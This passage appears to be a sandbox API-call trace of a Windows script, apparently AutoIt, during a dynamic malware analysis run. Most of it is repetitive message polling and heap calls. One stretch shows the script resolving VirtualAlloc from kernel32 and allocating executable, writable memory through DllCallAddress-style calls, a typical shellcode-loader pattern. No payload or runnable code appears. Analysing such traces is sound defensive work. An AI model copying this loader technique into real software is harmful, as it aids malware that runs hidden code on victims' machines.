wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.828] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.829] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.829] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.829] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.829] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.829] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.829] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.829] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.829] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.829] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.829] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.829] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.935] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.935] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.935] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.935] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.935] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.935] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.936] CharUpperBuffW (in: lpsz="DllStructCreate", cchLength=0xf | out: lpsz="DLLSTRUCTCREATE") returned 0xf [0136.937] CharUpperBuffW (in: lpsz="DllCall", cchLength=0x7 | out: lpsz="DLLCALL") returned 0x7 [0136.937] CharUpperBuffW (in: lpsz="DllCallAddress", cchLength=0xe | out: lpsz="DLLCALLADDRESS") returned 0xe [0136.937] CharUpperBuffW (in: lpsz="DllStructSetData", cchLength=0x10 | out: lpsz="DLLSTRUCTSETDATA") returned 0x10 [0136.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.939] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.939] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.939] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.939] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.939] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.939] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.939] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0136.939] LoadLibraryW (lpLibFileName="kernel32") returned 0x74650000 [0136.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7010 [0136.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd20 [0136.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VirtualAlloc", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd) returned 0x14b7058 [0136.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VirtualAlloc", cchWideChar=13, lpMultiByteStr=0x14b7058, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VirtualAlloc", lpUsedDefaultChar=0x0) returned 13 [0136.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7058 | out: hHeap=0x12c0000) returned 1 [0136.941] GetProcAddress (hModule=0x74650000, lpProcName="VirtualAlloc") returned 0x74667810 [0136.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7010 | out: hHeap=0x12c0000) returned 1 [0136.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd20 | out: hHeap=0x12c0000) returned 1 [0136.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300310 [0136.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd20 [0136.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd30 [0136.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0136.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12effb0 [0136.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd20 | out: hHeap=0x12c0000) returned 1 [0136.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0136.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0136.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effb0 | out: hHeap=0x12c0000) returned 1 [0136.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300310 | out: hHeap=0x12c0000) returned 1 [0136.942] VirtualAlloc (lpAddress=0x0, dwSize=0x5c2, flAllocationType=0x3000, flProtect=0x40) returned 0xea0000 [0136.943] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0070 [0136.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1314ca0 [0136.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1316800 [0136.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f98 [0136.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f20 [0136.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e90 [0136.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff40 [0136.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e90 | out: hHeap=0x12c0000) returned 1 [0136.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff40 | out: hHeap=0x12c0000) returned 1 [0136.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f20 | out: hHeap=0x12c0000) returned 1 [0136.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f20 [0136.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e90 [0136.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7088 [0136.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0020 [0136.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7088 | out: hHeap=0x12c0000) returned 1 [0136.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0020 | out: hHeap=0x12c0000) returned 1 [0136.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e90 | out: hHeap=0x12c0000) returned 1 [0136.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6dd0 [0136.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7010 [0136.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6fb0 [0136.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0010 [0136.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fb0 | out: hHeap=0x12c0000) returned 1 [0136.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0010 | out: hHeap=0x12c0000) returned 1 [0136.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7010 | out: hHeap=0x12c0000) returned 1 [0136.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6fb0 [0136.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6fc8 [0136.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6fe0 [0136.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff90 [0136.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fe0 | out: hHeap=0x12c0000) returned 1 [0136.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff90 | out: hHeap=0x12c0000) returned 1 [0136.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fc8 | out: hHeap=0x12c0000) returned 1 [0136.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70a0 [0136.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7058 [0136.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e78 [0136.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0090 [0136.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e78 | out: hHeap=0x12c0000) returned 1 [0136.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0090 | out: hHeap=0x12c0000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7058 | out: hHeap=0x12c0000) returned 1 [0136.949] FreeLibrary (hLibModule=0x74650000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001d0 | out: hHeap=0x12c0000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f80 | out: hHeap=0x12c0000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6c20 | out: hHeap=0x12c0000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6c38 | out: hHeap=0x12c0000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6cc8 | out: hHeap=0x12c0000) returned 1 [0136.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6c68 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6d88 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6c80 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6db8 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6d28 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6b00 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ae8 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6b30 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6b18 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70b8 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ef0 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ff8 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f50 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f08 | out: hHeap=0x12c0000) returned 1 [0136.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ed8 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f38 | out: hHeap=0x12c0000) returned 1 [0136.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f68 | out: hHeap=0x12c0000) returned 1 